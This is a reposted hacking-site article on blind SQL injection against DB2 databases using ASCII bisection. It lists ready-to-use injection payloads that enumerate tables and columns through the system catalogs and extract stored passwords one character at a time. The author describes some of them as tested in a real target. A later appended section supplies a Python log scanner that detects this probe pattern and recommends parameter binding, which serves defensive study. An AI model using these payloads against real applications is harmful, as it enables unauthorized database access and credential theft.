DB2 database injection using the ASCII bisection (half-interval) method

2009-09-22T00:00:00
ID MYHACK58:62200924745
Type myhack58
Reporter Anonymous
Modified 2009-09-22T00:00:00

Description

Reposted from: [Zhu Commander-in-chief]

DB2 database injection using the ASCII bisection method

The UNION approach has not been researched yet; I will tinker with it when I have time. A project ran into a DB2 database and there was not much information online, so I put this together. The first and second items have been tested in a real injection environment; the rest were tested OK in Query Analyzer.

Be decent: if you repost this, please cite the source.

Guess the number of user tables: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)

Guess the length of a table name: and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in('COLUMNS') fetch first 1 rows only)

Guess the ASCII code of the first character of the table name: and 3<(SELECT ASCII(SUBSTR(NAME,1,1)) FROM SYSIBM.SYSTABLES where name not in('COLUMNS') fetch first 1 rows only)

Guess the number of columns in the table: and 1<(SELECT COUNT(COLNAME) FROM SYSCAT.columns where tabname='TABLE')

Guess the length of the first column name: and 1<(SELECT LENGTH(COLNAME) FROM SYSCAT.columns where tabname='TABLE' and colno=0)

Guess the ASCII code of the first character of the first column name: and 1<(SELECT ASCII(SUBSTR(COLNAME,1,1)) FROM SYSCAT.columns where tabname='TABLE' and colno=0)

With the rows sorted by ID in descending order, guess the length of the first PASSWD: and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

With the rows sorted by ID in descending order, guess the ASCII code of the first character of the first PASSWD: and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

Guess the ASCII code of the first character of the second PASSWD: and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE where PASSWD not in('grou1') fetch first 1 rows only)
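
Every probe in the list above has the same shape (and N<(SELECT LENGTH/ASCII/COUNT(...) ...)), and bisection repeats one subquery while only N changes, which makes it visible in web access logs. The Python below is an added example, not part of the original post; the log format, the IP addresses and the names scan and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access log (not from the original page): one normal
# client and one client repeating a subquery with changing thresholds.
SAMPLE_LOG = """\
10.0.0.5 "GET /item?id=7 HTTP/1.1" 200
10.0.0.5 "GET /search?q=brand+and+model HTTP/1.1" 200
10.0.0.9 "GET /item?id=7+and+64%3C(SELECT+ASCII(SUBSTR(NAME,1,1))+FROM+SYSIBM.SYSTABLES+fetch+first+1+rows+only) HTTP/1.1" 200
10.0.0.9 "GET /item?id=7+and+96%3C(SELECT+ASCII(SUBSTR(NAME,1,1))+FROM+SYSIBM.SYSTABLES+fetch+first+1+rows+only) HTTP/1.1" 500
10.0.0.9 "GET /item?id=7+and+80%3C(SELECT+ASCII(SUBSTR(NAME,1,1))+FROM+SYSIBM.SYSTABLES+fetch+first+1+rows+only) HTTP/1.1" 200
10.0.0.9 "GET /item?id=7+and+72%3C(SELECT+ASCII(SUBSTR(NAME,1,1))+FROM+SYSIBM.SYSTABLES+fetch+first+1+rows+only) HTTP/1.1" 500
"""

# Shape shared by every probe in the list: and N<(SELECT LENGTH|ASCII|COUNT(...
PROBE = re.compile(
    r"\band\s+(\d+)\s*[<>=]+\s*\(\s*select\s+(length|ascii|count)\s*\((.*)",
    re.I | re.S)
CATALOG = re.compile(r"\b(sysibm\s*\.\s*systables|syscat\s*\.\s*columns)\b", re.I)
LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) ')

def scan(log_text, min_thresholds=3):
    """Flag clients that repeat one subquery with several numeric thresholds."""
    seen = defaultdict(lambda: defaultdict(set))   # ip -> subquery -> thresholds
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        probe = PROBE.search(unquote_plus(target))  # decode %3C, '+' and so on
        if probe:
            subquery = re.sub(r"\s+", " ", probe.group(3).lower()).strip()
            seen[ip][(probe.group(2).lower(), subquery)].add(int(probe.group(1)))
    findings = {}
    for ip, subqueries in seen.items():
        (func, subquery), thresholds = max(subqueries.items(), key=lambda kv: len(kv[1]))
        if len(thresholds) >= min_thresholds:
            findings[ip] = {"function": func, "thresholds": sorted(thresholds),
                            "catalog": bool(CATALOG.search(subquery))}
    return findings

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG).items():
        print(ip, finding)
```

The detector only reports what is already happening; the fix on the application side is to bind the request value as a parameter so it never reaches DB2 as SQL text.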